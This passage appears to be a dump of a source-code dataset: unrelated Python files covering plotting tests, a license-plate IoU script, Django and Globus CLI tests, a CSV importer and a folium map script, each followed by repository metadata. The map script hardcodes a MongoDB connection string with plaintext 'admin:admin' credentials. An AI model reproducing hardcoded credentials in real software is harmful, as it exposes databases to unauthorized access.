def test_cross_correlator_daily_mixed_vital_raw(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir_mixed,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=self.in_dir_mixed, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(25, len(files))
@testing.skip_because_is_runner
def test_cross_hours_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_days_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_correlator_hours_mixed_raw_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_correlator_days_mixed_vital_raw(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| 44.691275
| 78
| 0.565851
| 6,177
| 0.927617
| 0
| 0
| 2,906
| 0.436402
| 0
| 0
| 291
| 0.0437
|
9fd91ec0b1f55cd338e90af15b11bcbae0dc4915
| 1,471
|
py
|
Python
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | 2
|
2022-03-02T11:59:19.000Z
|
2022-03-18T17:59:28.000Z
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | 1
|
2022-03-03T14:07:19.000Z
|
2022-03-03T14:07:19.000Z
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from typing import Dict, List
try:
import matplotlib.pyplot as plt
MATPLOTLIB = True
except:
MATPLOTLIB = False
from loguru import logger
from .eval import EvalData
def plot_losses(losses):
if not MATPLOTLIB:
logger.error("Maplotlib not installed. Halting the plot process!")
return
plt.plot(losses)
plt.show()
def plot_history(
history: Dict[str, List[EvalData]], plot_type="loss", figure_size=(20, 7)
) -> None:
"""
This function plots train/val metrics in the same figure.
"""
if not MATPLOTLIB:
logger.error("Maplotlib not installed. Halting the plot process!")
return
train = history.get("train", [])
val = history.get("val", [])
# get epoch data common to both
t_epochs = list(map(lambda e: e.epoch, train))
v_epochs = list(map(lambda e: e.epoch, val))
epochs = set(t_epochs).intersection(v_epochs)
train = filter(lambda e: e.epoch in epochs, train)
train = sorted(train, key=lambda e: e.epoch)
val = filter(lambda e: e.epoch in epochs, val)
val = sorted(val, key=lambda e: e.epoch)
plt.figure(figsize=figure_size)
plt.plot([getattr(data, plot_type) for data in train])
plt.plot([getattr(data, plot_type) for data in val])
plt.legend([f"Train {plot_type}", f"Val {plot_type}"])
plt.xlabel("epoch")
plt.ylabel(f"{plot_type}")
def main():
pass
if __name__ == "__main__":
main()
| 23.349206
| 77
| 0.650578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 317
| 0.2155
|
9fdabb9fe3ddfe1efb0455a952de16d9ff31f05a
| 3,277
|
py
|
Python
|
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
import itertools
import os
import sys
import cv2
import numpy as np
from SelectiveSearch import SelectiveSearch
images_path = "Images"
annotations = "Annotations"
cv2.setUseOptimized(True)
selective_search = SelectiveSearch()
train_images = []
train_labels = []
SS_IMG_SIZE = (224, 224)
# chunk = int(sys.argv[1])
def get_annotation(file: str) -> (dict, object):
f = open(file)
[filename, x1, y1, dx, dy] = f.readline().split('\t')[0:5]
f.close()
img_filename = os.path.join(images_path, filename)
boundary_box = {
'x1': int(x1),
'y1': int(y1),
'x2': int(x1) + int(dx),
'y2': int(y1) + int(dy)
}
return boundary_box, img_filename
def get_iou(bb1: dict, bb2: dict) -> float:
x_left = max(bb1['x1'], bb2['x1'])
y_top = max(bb1['y1'], bb2['y1'])
x_right = min(bb1['x2'], bb2['x2'])
y_bottom = min(bb1['y2'], bb2['y2'])
if x_right < x_left or y_bottom < y_top:
return 0.0
intersection_area = (x_right - x_left) * (y_bottom - y_top)
bb1_area = (bb1['x2'] - bb1['x1']) * (bb1['y2'] - bb1['y1'])
bb2_area = (bb2['x2'] - bb2['x1']) * (bb2['y2'] - bb2['y1'])
iou = intersection_area / float(bb1_area + bb2_area - intersection_area)
assert iou >= 0.0
assert iou <= 1.0
return iou
# filenames = list(enumerate(
# f for f in os.listdir(annotations)
# if f.startswith('wts')
# ))[chunk * 20:(chunk + 1) * 20]
#
# for index, file in filenames:
# try:
# print(f"{index}\t{file}")
# boundary_box, img_filename = get_annotation(os.path.join(annotations, file))
# ss_results, img_out = selective_search.process_image(img_filename)
# lp_counter = 0
# bg_counter = 0
# fflag = False
# bflag = False
#
# for result in itertools.islice(ss_results, 2000):
# x1, y1, dx, dy = result
# if file.startswith('wts_textonly'):
# iou = 0
# else:
# iou = get_iou(boundary_box, {
# 'x1': x1,
# 'y1': y1,
# 'x2': x1 + dx,
# 'y2': y1 + dy
# })
# if bg_counter < 30:
# if iou < 0.3:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(0)
# bg_counter += 1
# else:
# bflag = True
# if lp_counter < 30:
# if iou > 0.85:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(1)
# lp_counter += 1
# else:
# fflag = True
# if fflag and bflag:
# break
# except Exception as e:
# print(e)
# print(f"Error occurred in {file}")
#
# np.save(f'train_images_chunk{chunk}', train_images)
# np.save(f'train_labels_chunk{chunk}', train_labels)
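A quick check of get_iou with hypothetical boxes (assumes the function defined above is in scope, e.g. pasted alongside it; the coordinates are made up):
box_a = {'x1': 0, 'y1': 0, 'x2': 10, 'y2': 10}
box_b = {'x1': 5, 'y1': 5, 'x2': 15, 'y2': 15}
# intersection = 5 * 5 = 25, union = 100 + 100 - 25 = 175
assert abs(get_iou(box_a, box_b) - 25 / 175) < 1e-9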
| 30.06422
| 97
| 0.523039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,054
| 0.626793
|
9fdadafb759d17ded7ccd299bdbfcf9faeff04b7
| 66
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
rx = re.compile(r'\b%s\b' % r'\b|\b'.join(map(re.escape, adict)))
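The one-liner builds a whole-word alternation over the keys of adict, which this snippet leaves undefined. A fuller, hedged sketch of how such a pattern is typically used for one-pass multiple replacement; the dictionary and helper below are illustrative additions, not part of the recipe as shown:
import re
adict = {'cat': 'feline', 'dog': 'canine'}   # example mapping (assumed)
rx = re.compile(r'\b%s\b' % r'\b|\b'.join(map(re.escape, adict)))
def multiple_replace(text, adict=adict):
    # replace each whole-word occurrence of a key with its mapped value
    return rx.sub(lambda match: adict[match.group(0)], text)
assert multiple_replace('the cat chased the dog') == 'the feline chased the canine'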
| 33
| 65
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 17
| 0.257576
|
9fddbda4c3c7b498a0499af95d1e10c2e4bd8c81
| 233
|
py
|
Python
|
projects/admin.py
|
kylef-archive/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | 2
|
2015-02-15T19:01:29.000Z
|
2015-11-08T13:25:14.000Z
|
projects/admin.py
|
kylef/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | null | null | null |
projects/admin.py
|
kylef/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | 1
|
2021-08-02T19:08:29.000Z
|
2021-08-02T19:08:29.000Z
|
from django.contrib import admin
from projects.models import Project
class ProjectAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ['title']}
list_display = ('title', 'git')
admin.site.register(Project, ProjectAdmin)
| 29.125
| 45
| 0.751073
| 119
| 0.51073
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.107296
|
9fde09067036bce742f20360db8b7e67c431adac
| 3,636
|
py
|
Python
|
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.db import transaction
from rest_framework.exceptions import ValidationError
from ..models import OfficeBlock, OfficeFloor, OfficeFloorSection
from core.tests import CoreBaseTestCase
User = get_user_model()
class OfficeBlockModelTest(CoreBaseTestCase):
"""Tests for the Office Block Models"""
def setUp(self):
super(OfficeBlockModelTest, self).setUp()
self.admin = User.objects.create_superuser(
email='testuser@gmail.com', cohort=19,
slack_handle='tester', password='qwerty123'
)
self.office_block = OfficeBlock.objects.create(
name="Block A"
)
self.office_floor = OfficeFloor.objects.create(
number=5,
block=self.office_block
)
self.office_floor_section = OfficeFloorSection.objects.create(
name="Right Wing",
floor=self.office_floor
)
self.all_office_blocks = OfficeBlock.objects.all()
self.all_office_floors = OfficeFloor.objects.all()
self.all_office_floor_sections = OfficeFloorSection.objects.all()
self.token_user = 'testtoken'
def test_add_new_office_block(self):
"""Test add new office block"""
self.assertEqual(self.all_office_blocks.count(), 1)
new_office_block = OfficeBlock(name="Block B")
new_office_block.save()
self.assertEqual(self.all_office_blocks.count(), 2)
def test_add_new_office_floor(self):
"""Test add new office floor"""
self.assertEqual(self.all_office_floors.count(), 1)
new_office_floor = OfficeFloor(
number=10,
block=self.office_block)
new_office_floor.save()
self.assertEqual(self.all_office_floors.count(), 2)
def test_add_new_office_floor_section(self):
"""Test add new Office Floor Section"""
self.assertEqual(self.all_office_floor_sections.count(), 1)
new_office_floor_section = OfficeFloorSection(
name="Left Wing",
floor=self.office_floor)
new_office_floor_section.save()
self.assertEqual(self.all_office_floor_sections.count(), 2)
def test_cannot_add_existing_office_block(self):
"""Test cannot add existing office_block name"""
self.assertEqual(self.all_office_blocks.count(), 1)
with transaction.atomic():
with self.assertRaises(ValidationError):
new_office_block = OfficeBlock.objects.create(
name="Block A"
)
new_office_block.save()
self.assertEqual(self.all_office_blocks.count(), 1)
def test_cannot_add_existing_office_floor_section(self):
"""Test cannot add existing office floor section name"""
self.assertEqual(self.all_office_floor_sections.count(), 1)
with transaction.atomic():
with self.assertRaises(ValidationError):
new_office_floor_section = OfficeFloorSection(
name="Right Wing",
floor=self.office_floor
)
new_office_floor_section.save()
self.assertEqual(self.all_office_floor_sections.count(), 1)
def test_office_block_model_string_representation(self):
self.assertEqual(str(self.office_block), "Block A")
def test_office_floor_model_string_representation(self):
self.assertEqual(self.office_floor.number, 5)
def test_office_floor_section_model_string_representation(self):
self.assertEqual(str(self.office_floor_section), "Right Wing")
| 37.484536
| 73
| 0.668592
| 3,365
| 0.925468
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.103685
|
9fdf686d8f768389a99935e8b0188491d6cb098b
| 2,481
|
py
|
Python
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 47
|
2016-04-21T19:51:17.000Z
|
2022-02-25T14:13:30.000Z
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 421
|
2016-04-20T18:45:24.000Z
|
2022-03-14T14:50:41.000Z
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 20
|
2016-09-10T20:25:27.000Z
|
2021-10-06T16:02:47.000Z
|
import pytest
def test_collection_show(run_line, load_api_fixtures, add_gcs_login):
data = load_api_fixtures("collection_operations.yaml")
cid = data["metadata"]["mapped_collection_id"]
username = data["metadata"]["username"]
epid = data["metadata"]["endpoint_id"]
add_gcs_login(epid)
_result, matcher = run_line(f"globus collection show {cid}", matcher=True)
matcher.check(r"^Display Name:\s+(.*)$", groups=["Happy Fun Collection Name"])
matcher.check(r"^Owner:\s+(.*)$", groups=[username])
matcher.check(r"^ID:\s+(.*)$", groups=[cid])
matcher.check(r"^Collection Type:\s+(.*)$", groups=["mapped"])
matcher.check(r"^Connector:\s+(.*)$", groups=["POSIX"])
def test_collection_show_private_policies(run_line, load_api_fixtures, add_gcs_login):
data = load_api_fixtures("collection_show_private_policies.yaml")
cid = data["metadata"]["collection_id"]
username = data["metadata"]["username"]
epid = data["metadata"]["endpoint_id"]
add_gcs_login(epid)
_result, matcher = run_line(
f"globus collection show --include-private-policies {cid}", matcher=True
)
matcher.check(r"^Display Name:\s+(.*)$", groups=["Happy Fun Collection Name"])
matcher.check(r"^Owner:\s+(.*)$", groups=[username])
matcher.check(r"^ID:\s+(.*)$", groups=[cid])
matcher.check(r"^Collection Type:\s+(.*)$", groups=["mapped"])
matcher.check(r"^Connector:\s+(.*)$", groups=["POSIX"])
matcher.check(r"Root Path:\s+(.*)$", groups=["/"])
matcher.check(
r"^Sharing Path Restrictions:\s+(.*)$",
groups=[
'{"DATA_TYPE": "path_restrictions#1.0.0", "none": ["/"], "read": ["/projects"], "read_write": ["$HOME"]}', # noqa: E501
],
)
@pytest.mark.parametrize(
"epid_key, ep_type",
[
("gcp_endpoint_id", "Globus Connect Personal"),
("endpoint_id", "Globus Connect Server v5 Endpoint"),
],
)
def test_collection_show_on_non_collection(
run_line, load_api_fixtures, epid_key, ep_type
):
data = load_api_fixtures("collection_operations.yaml")
epid = data["metadata"][epid_key]
result = run_line(f"globus collection show {epid}", assert_exit_code=3)
assert (
f"Expected {epid} to be a collection ID.\n"
f"Instead, found it was of type '{ep_type}'."
) in result.stderr
assert (
"Please run the following command instead:\n\n"
f" globus endpoint show {epid}"
) in result.stderr
| 36.485294
| 132
| 0.639258
| 0
| 0
| 0
| 0
| 732
| 0.295042
| 0
| 0
| 1,126
| 0.453849
|
9fdfc62d17a4273e27c2f11b9b40558a4ec8fe41
| 2,044
|
py
|
Python
|
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | null | null | null |
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | 2
|
2021-09-08T02:16:00.000Z
|
2022-01-13T02:57:26.000Z
|
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | null | null | null |
import argparse
import random
import ihuntapp
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build an #iHunt job app page.')
parser.add_argument('--name', "-n",
default="Unnamed job", help='Name of the job')
parser.add_argument('--description', "-d",
default="No description available", help='Description of the job')
parser.add_argument('--image', "-i",
type=str, default="", help='Job image', required=True)
parser.add_argument('--price', "-p",
default=(random.randint(1, 18) * 500), help='Price the job pays')
parser.add_argument('--stars', "-s",
type=float, default=(random.randint(3, 8) * 0.5), help='Star level of job')
parser.add_argument('--currency', default="$", help='Currency symbol')
parser.add_argument('--distance',
type=float, default=random.uniform(5, 25), help='Distance of job')
parser.add_argument('--distanceunit', default="miles", help='distance unit')
parser.add_argument('--time', "-t",
type=float, default=random.randint(1, 3), help='Time of post')
parser.add_argument('--timeunit', default="days", help='Time unit')
parser.add_argument('--remaining', "-r",
type=float, default=random.randint(3, 8), help='Time of post')
parser.add_argument('--remainingunit', default="days", help='Time unit')
parser.add_argument('--output', '-o', default='job.png', help='Filename to save screenshot')
args = parser.parse_args()
phone = ihuntapp.iHuntApp(args.name, args.description, args.image)
phone.price = args.price
phone.stars = args.stars
phone.currency = args.currency
phone.distance = args.distance
phone.distanceunit = args.distanceunit
phone.time = args.time
phone.timeunit = args.timeunit
phone.remaining = args.remaining
phone.remainingunit = args.remainingunit
phone.screenshot(args.output)
| 44.434783
| 99
| 0.626223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.251468
|
9fe154537630b5423fecebdaa0e5bc8b96aff771
| 4,945
|
py
|
Python
|
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
import sys
import os
import csv
from tqdm import tqdm
import django
from import_util import display_inserted, display_skipped
project_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
django.setup()
from core.models.asset import AssetCategory, AssetSubCategory # noqa
def load_csv_file(file_name): # noqa
print('\n')
if os.path.isfile(file_name):
if not file_name.endswith('.csv'):
return 'File not supported'
else:
with open(file_name, 'r', ) as f:
file_length = len(f.readlines()) - 1
f.seek(0)
skipped = dict()
inserted_records = []
data = csv.DictReader(f, delimiter=',')
counter = 1
with tqdm(total=file_length) as pbar:
for row in data:
assets_category = AssetCategory.objects.\
filter(category_name=row['Category']).exists()
assets_sub_category = AssetSubCategory.objects.\
filter(sub_category_name=row['Sub Category']).\
exists()
if assets_category:
if assets_sub_category:
skipped[row['Category']] = [(
'Category {0} already exists'.
format(row['Category'])), counter]
skipped[row['Sub Category']] = [(
'Sub Category {0} already exists'.
format(row['Sub Category'])), counter]
else:
category = AssetCategory.objects.get(
category_name=row['Category']
)
assets_sub_category = AssetSubCategory.\
objects.create(
sub_category_name=row['Sub Category'],
asset_category=category
)
assets_sub_category.save()
inserted_records.append([
assets_sub_category,
counter]
)
skipped[row['Category']] = [(
'Category {0} already exists'.
format(row['Category'])), counter]
elif not assets_category:
if assets_sub_category:
asset_category = AssetCategory.objects.create(
category_name=row['Category']
)
asset_category.save()
inserted_records.append([
asset_category,
counter]
)
skipped[row['Sub Category']] = [(
'Sub Category {0} already exists'.
format(row['Sub Category'])), counter]
else:
asset_category = AssetCategory.objects.create(
category_name=row['Category']
)
asset_category.save()
category = AssetCategory.objects.get(
category_name=row['Category']
)
sub_category = AssetSubCategory.objects.create(
sub_category_name=row['Sub Category'],
asset_category=category
)
sub_category.save()
inserted_records.append([
asset_category,
counter]
)
inserted_records.append([
sub_category,
counter]
)
counter += 1
pbar.update(1)
print("\n")
display_inserted(inserted_records)
display_skipped(skipped)
return 'File not found'
if __name__ == '__main__':
print('********* Import the csv file ********')
input_file = input('Import the file: ')
load_csv_file(input_file) # noqa
| 44.151786
| 79
| 0.394944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 489
| 0.098888
|
9fe1fc1239cc234d72923d2663fd719390f1395d
| 454
|
py
|
Python
|
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | 4
|
2021-09-10T19:20:42.000Z
|
2022-02-12T00:27:40.000Z
|
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | null | null | null |
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | 1
|
2021-11-08T15:32:46.000Z
|
2021-11-08T15:32:46.000Z
|
def enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
ENDPOINT_URLS_ENUM = enum(
MAIN='https://api.mainnet-beta.solana.com',
DEV='https://api.devnet.solana.com',
TEST='https://api.testnet.solana.com',
)
ENDPOINT_URLS = {
"MAIN":'https://api.mainnet-beta.solana.com',
"DEV":'https://api.devnet.solana.com',
"TEST":'https://api.testnet.solana.com',
}
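A short usage sketch for the enum() helper and the endpoint tables above (the Network example is made up; the URL assertion restates values already defined in this file):
Network = enum('MAIN', 'DEV', 'TEST')
assert Network.MAIN == 0 and Network.TEST == 2
assert ENDPOINT_URLS['DEV'] == ENDPOINT_URLS_ENUM.DEV == 'https://api.devnet.solana.com'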
| 30.266667
| 66
| 0.645374
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 223
| 0.491189
|
9fe207c6dcc8198ff87d2e16175a87d21e6112ea
| 812
|
py
|
Python
|
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | null | null | null |
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | 1
|
2021-11-13T10:12:49.000Z
|
2021-11-16T12:17:01.000Z
|
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | null | null | null |
import pymongo
import folium
from pymongo import MongoClient
db = MongoClient('mongodb+srv://admin:admin@cluster0-vuh1j.azure.mongodb.net/test?retryWrites=true&w=majority')
db = db.get_database('BD_EMPRESAS')
collection = db.empresas
cnpj = []
latitude = []
longitude = []
qtd_range = []
endereco = []
cnpj = db.get_collection('empresas').distinct("cnpj")
latitude = db.get_collection('empresas').distinct("latitude")
qtd_range = len(latitude)
longitude = db.get_collection('empresas').distinct("longitude")
endereco = db.get_collection('empresas').distinct("endereco")
mapa = folium.Map(location=[-23.4795233,-46.2698754],zoom_start=9)
for i in range(qtd_range):
folium.Marker([latitude[i], longitude[i]], popup='CNPJ: '+cnpj[i]+'\n Endereco: '+endereco[i]).add_to(mapa)
mapa.save("index.html")
| 24.606061
| 111
| 0.730296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 218
| 0.268473
|
9fe282030a02b4055f9395a841b3fabbcbf1b05f
| 835
|
py
|
Python
|
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
import anasyspythontools as apt
import pytest
import glob
import os
TESTFOLDER = os.path.join(os.path.dirname(__file__),"test data")
@pytest.mark.parametrize("filename", glob.glob(os.path.join(TESTFOLDER, "*.irb")))
class TestBG:
def setup_method(self, filename):
pass
def teardown_method(self):
pass
def test_basic_read(self, filename):
f = apt.read(filename)
assert f is not None
assert isinstance(f, apt.irspectra.Background)
    def test_read_does_not_raise(self, filename):
        f = apt.read(filename)
def test_check_equality(self, filename):
assert apt.read(filename) == apt.read(filename)
def test_check_attributes(self, filename):
f = apt.read(filename)
assert hasattr(f,"wn")
assert hasattr(f,"signal")
| 23.194444
| 83
| 0.646707
| 611
| 0.731737
| 0
| 0
| 695
| 0.832335
| 0
| 0
| 40
| 0.047904
|
9fe2e87d337b6c88bd8c4467d12c5b714809bf62
| 1,015
|
py
|
Python
|
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
import yaml
from yaml import Loader, Dumper
from .pathify import *
class yml:
def __init__(self):
pass
def dump(self,
data,
path : str
):
'''Dumps incoming python data into a YAML file at `path`.
-----
* `data` (dict,list,tuple) : Any YAML dump friendly python data structure.
* `path` (str) : Path to YAML output file.
'''
with open(path, "w") as output_file:
yaml.dump(data, output_file, Dumper=yaml.Dumper)
def load(self,
path : str
):
'''Loads YAML data from a file at the provided path.
-----
* `path` (str) : Path to YAML file.
* `return` (dict,list,tuple) : Returns a python data structure.
'''
path = pathify(path)
with open(path,'r') as input_file:
return yaml.load(input_file, Loader=yaml.Loader)
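A round-trip usage sketch for the yml class (the data and file name are illustrative, and it assumes pathify() returns a path that open() accepts for a plain relative filename):
config = {'pump': {'rate_ml_per_s': 2.5, 'enabled': True}}
y = yml()
y.dump(config, 'config.yml')
assert y.load('config.yml') == config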
| 30.757576
| 86
| 0.487685
| 945
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 475
| 0.46798
|
9fe326bc9f4e12d04244fe6f4b5e92ea0f66a315
| 88
|
py
|
Python
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 1
|
2021-10-01T05:54:02.000Z
|
2021-10-01T05:54:02.000Z
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 7
|
2021-09-21T11:38:50.000Z
|
2021-10-06T10:28:11.000Z
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 4
|
2021-09-21T12:08:05.000Z
|
2021-10-01T05:54:08.000Z
|
from .template import template
from .tools import tools
from .LinearReg import LinearReg
| 29.333333
| 32
| 0.840909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
9fe3746b0ca2a17a4da60916603ceccce096325e
| 6,994
|
py
|
Python
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 1,080
|
2020-06-22T07:44:22.000Z
|
2022-03-22T07:46:48.000Z
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 24
|
2020-08-06T02:06:37.000Z
|
2022-03-31T03:34:35.000Z
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 170
|
2020-08-14T08:39:18.000Z
|
2022-03-23T12:58:17.000Z
|
# -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hypernets.core.ops import Identity
from hypernets.core.search_space import HyperSpace, Int, Real, Choice, Bool
from hypernets.core.searcher import OptimizeDirection
